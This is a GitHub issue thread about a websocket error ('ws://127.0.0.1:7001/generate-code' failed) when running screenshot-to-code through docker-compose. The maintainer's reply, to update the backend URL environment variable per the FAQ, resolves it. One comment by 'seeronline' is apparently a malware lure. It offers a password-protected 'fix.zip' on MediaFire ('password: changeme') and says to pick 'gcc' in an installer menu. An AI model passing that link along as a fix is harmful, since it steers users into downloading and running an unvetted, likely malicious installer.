### ISSUE TITLE
'ws://127.0.0.1:7001/generate-code' failed:

### ISSUE THREAD

**Issue by AnhDai1997** [abi/screenshot-to-code#393]
**Describe the bug**
I run with docker command: docker-compose up -d --build

but get error as  picture below

![Screenshot 2024-08-26 145727](https://github.com/user-attachments/assets/8cab0fbf-effb-4631-8e04-bb70928d7caf)

Here is backend and frontend log
![Screenshot 2024-08-26 145808](https://github.com/user-attachments/assets/3ed02953-e2cf-4b67-a1b7-13d327ac9174)

how to fix this? thank you

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abi** [comment]
Since you're running the backend on the IP 172.xx, You need to update the backend URL env var. See the FAQ: https://github.com/abi/screenshot-to-code?tab=readme-ov-file#%EF%B8%8F-faqs

Let me know if it doesn't work.

**Comment by AnhDai1997** [comment]
Yes, it working. Thank you!
